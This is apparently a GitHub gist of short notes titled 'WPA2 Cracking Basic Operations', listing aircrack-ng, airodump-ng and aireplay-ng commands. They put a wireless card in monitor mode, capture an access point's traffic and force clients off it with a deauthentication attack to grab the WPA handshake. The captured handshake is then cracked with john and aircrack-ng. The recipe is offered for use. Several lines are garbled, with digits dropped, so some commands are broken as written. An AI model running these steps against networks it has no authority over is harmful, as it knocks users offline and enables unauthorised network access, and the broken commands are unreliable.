Created
November 16, 2020 16:45
-
-
Save jkeychan/31830863361da24f92d623329aad44f3 to your computer and use it in GitHub Desktop.
WPA2 Cracking Basic Operations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Start monitor mode on usable interface: | |
airmon-ng start $interface | |
Dump all found APs and bssid, channel, etc: | |
airodump-ng -i -g -w allAPs,out $interface | |
-i only saves IVs | |
-g tries to get GPS coords | |
-w dump file prefix | |
For each entry in the dump file, run airodump-ng again against a specific AP to capture packets: | |
airodump-ng -c $channel_ID -bssid $AP_mac -w $APname.out $interface | |
Run a de-auth attack against the same AP from the previous airodump-np to try and capture the -way handshake: | |
aireplay-ng - 1 -a $AP_mac $interface | |
How to determine if a handshake has been detected???? | |
1. Visually inspect in the airodump-ng output | |
2. Use Wireshark and apply a filter of ?eapol?. This displays only eapol packets you are interested in. Thus you can see if capture contains ,1,2,3 or eapol packets. | |
Send pcap file to be cracked once handshake was detected | |
john --stdout --incrementalall |aircrack-ng -b $AP_mac -w - *.cap | |
OR | |
use a dictionary file either with mutations from john or straight to aircrack-ng | |
NOTE cracking of WPA PSK will only work (in a reasonable amount of time) if the password is short (closer to 8 chars than 63) and/or is based on a dictionary word | |
the only part that needs to be written is the wireshark filter |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment